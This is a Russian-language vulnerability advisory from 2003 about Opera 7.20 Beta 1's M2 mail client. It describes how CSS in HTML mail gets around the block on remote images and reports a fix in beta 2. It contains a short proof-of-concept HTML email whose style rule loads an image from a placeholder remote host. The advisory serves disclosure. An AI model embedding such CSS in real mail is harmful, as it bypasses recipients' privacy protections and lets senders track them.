Обход ограничений на просмотр внедренных объектов в почтовом клиенте M2 в Opera
| Дата публикации: | 28.07.2003 |
| Всего просмотров: | 1493 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в почтовом клиенте M2 в Opera. Удаленный пользователь может сконструировать HTML, чтобы обойти ограничения клиента на внедренном удаленном объекте.
Сascading style sheet (CSS) могут использоваться для обхода ограничений на просмотр внедренных изображений, расположенных на удаленном сервере. Пример:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style type="text/css">
omf|headers { background-image: url(http://[target]/t.png) }
</style>
</head>
<body>
{ Normal mail body here }
</body>
</html>
Уязвимость обнаружена в Opera 7.20 Beta 1, build 2981 only
Уязвимость устранена в Opera 7.20 beta 2, которую можно скачать отсюда: http://www.opera.com/download/ |
| Ссылки: | Vulnerability in the mail client in Opera 7.20 beta 1. |